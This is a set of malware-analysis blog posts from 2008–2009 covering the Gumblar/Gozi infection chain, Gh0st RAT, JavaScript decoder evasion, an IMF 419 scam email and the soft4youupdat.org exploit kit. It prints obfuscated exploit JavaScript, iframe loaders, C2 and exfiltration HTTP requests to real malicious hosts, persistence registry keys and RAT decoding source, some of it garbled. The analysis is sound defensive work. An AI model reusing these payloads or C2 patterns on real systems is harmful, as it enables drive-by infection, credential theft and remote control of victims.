%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>

<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>

Malware Analysis

http://litehitscar.cn/load.php?id=5 (load.exe)

The request for load.php returns the binary file load.exe.

File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87

The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;

Rnd: 982306

Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:

eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..

************************************************************************

GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112

************************************************************************

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

guid=397089404

************************************************************************

The downloaded data creates 4 temp files:

C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe

wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:

C:\WINDOWS\system32\crypts.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run

The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)

GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19

0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;

************************************************************************

GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive

************************************************************************

wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:

C:\WINDOWS\9129837.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"

The file 9129837.exe creates:

C:\WINDOWS\new_drv.sys

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]

The following services are stopped:

Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center

The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.

POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache

----------------------------28c6e728c6e728c6e7

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:

----------------------------28c6e728c6e728c6e7--

************************************************************************

GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44

************************************************************************

GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44

************************************************************************

POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache

----------------------------28cd6f28cd6f28cd6f

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....

----------------------------28cd6f28cd6f28cd6f—

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache

----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

load=1
----------------------------28ea2e28ea2e28ea2e--

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache

----------------------------297799297799297799

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"

Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache

----------------------------2a3ea22a3ea22a3ea2

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

confirm=1

----------------------------2a3ea22a3ea22a3ea2—

************************************************************************

wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:

C:\WINDOWS\psbdxt.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61

wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.

Creates:
C:\Documents and Settings\John\John.exe

A registry key is created to launch the malware at startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i

The malware connected to 94.247.2.95 (Latvia) for C2.

GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream

Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6

Gh0st Rat

2009-04-11T22:40:00.011-04:00

On April 11, 2009, researchers at the Information Warfare Monitor released a report that uncovered a suspected cyber espionage network of over 1,295 infected hosts in 103 countries. The report "Tracking GhostNet: Investigating a Cyber Espionage Network" is summarized as:

"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.

The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."

Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.

Gh0st RAT Beta 3.6 (English) Usage

Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.

File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D

The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.

The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.

static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}

int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;

x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;

if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;

if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;

if(done <>>8;
if(done <>>0;
}

len = q - (unsigned char*)(s);

*data = (char*)realloc((void *)s, len);

return len;
}

char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);

for (i = 0; i <>

The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.

Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net

http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar

In this example, the Gh0st RAT server was created as:

File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158

Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.

GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org
Pragma: no-cache

HTTP/1.1 200 OK
Date: Sat, 11 Apr 2009 18:13:58 GMT
Server: Apache
Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT
ETag: "1bdecfd-20-49e0dc2b"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: image/jpeg

AAAArqaxva61p72vva6xqaevnw==AAAA

Server.exe creates the dll file 6to4svc.dll in the system32 directory.

File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3

The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]

The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.

Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o

Evading JavaScript Decoders?

2009-01-20T16:40:00.008-05:00

I was recently provided exploit code that appears to be designed to evade analysts using decoding tools such as Malzilla. Obfuscation techniques continually evolve, but it is interesting when malcoders utilize techniques to deliberately mess with analysts.

In the past, I've seen exploit code writers throw in a closing </textarea> tag nullifying the technique of using textarea tags to manipulate document.write script. An older method of decoding JavaScript was to change script like document.write(r) to document.write("<textarea>"+r+"</textarea>"). The output would be placed in an html textarea object. The following decoded sample reveals a closing textarea tag which renders the decoding technique useless.

</textarea><html>
<head>
<title></title>
<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

A recent example originated from various advertising content that redirected to srv(dot)ad-adnet(dot).net/code/smain.php?scout=jvcxeng. The sv.ad-adnet.net request returned obfuscated code.

<script language="javascript">

var enschr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var i;var enschrs=new Array();for(i=0;i<enschr.length;i++){enschrs[i]=enschr.charAt(i);}var rvenchr=new Array();for(i=0;i<enschrs.length;i++){rvenchr[enschrs[i]]=i;}var ensstr, enscnt;function sensstr(str){ensstr=str;enscnt=0;}function rrvren(){if(!ensstr) return -1;while(true){if(enscnt >= ensstr.length) return -1;var [truncated]...

In this example, Malzilla is used to decode the eval function.

The eval() function is replaced in Malzilla with the decoded result and decoded again. It looks like the second decoded result is “---“.

The “---“ appears to be used to make analysts think they received a result or lack of a result. The decoded content contains a bunch of whitespace that requires the analyst to scroll down to see the exploit code. The only explanation is the bad guys are attempting to to throw analysts off.

It's isn't an elaborate effort, but it is interesting to know the bad guys know that analysts are looking at and decoding their exploit code and are trying to counteract analyst techniques with a wide variety of TTPs.

IMF 419 Scam

2008-12-21T20:43:00.006-05:00

419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.

The email is spoofed from Mr.Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP 58.63.81.97. The email request the reply go to imfec@in.com.

Name: 97.81.63.58.broad.gz.gd.dynamic.163data.com.cn
Address: 58.63.81.97

Delivered-To: xxx@gmail.com
Received: by 10.86.95.1 with SMTP id s1cs313745fgb;
Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by 10.114.145.1 with SMTP id s1mr2802117wad.118.1229798166053;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Return-Path:
Received: from pfyq6 ([58.63.81.97])
by mx.google.com with SMTP id k21si16564504waf.32.2008.12.20.10.36.04;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) client-ip=58.63.81.97;
Authentication-Results: mx.google.com; spf=neutral (google.com: 58.63.81.97 is neither permitted nor denied by best guess record for domain of imf@imf.org) smtp.mail=imf@imf.org
Message-Id: <494d3b16.15bb720a.7b0f.009fsmtpin_added@mx.google.com>
From: "Mr.Dominique Strauss-Kahn"
Subject: ECONOMIC STORM
To: xxx@gmail.com
Content-Type: text/plain;
charset="US-ASCII"
Reply-To: imfec@in.com
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3

This is to inform you/your company that IMF international monetary fund and the
world bank have collaborated to tackle the global economic storm facing
the world.
These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion
United State Dollars ) to finance individuals/companies around the globe
who have a reasonable project.
All applicant should send their full data and project details (project name,
project purpose,project cost) to the address given below to apply the
support for your project.

Reply to Mr. John Condo
Project Finance Section
IMF Office Beijing China
( http://www.imf.org/external/np/omd/bios/rrf.htm )
Email imfec@in.com

Yours sincerely,
Mr.Dominique Strauss-Kahn
Managing Director, IMF

The email attempts to validate itself by including a hyperlink to the bio of Mr.Dominique Strauss-Kahn. The only problem is the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.

Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. you wouldn't think it's that profitable, but every once in a while, the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is i'm looking forward to my slice of the $10 Billion. WoooHooo!!!

soft4youupdat.org Exploit Analysis

2008-12-19T21:53:00.010-05:00

The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

(1)
<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

(2)
<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

(3)
<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

(4)
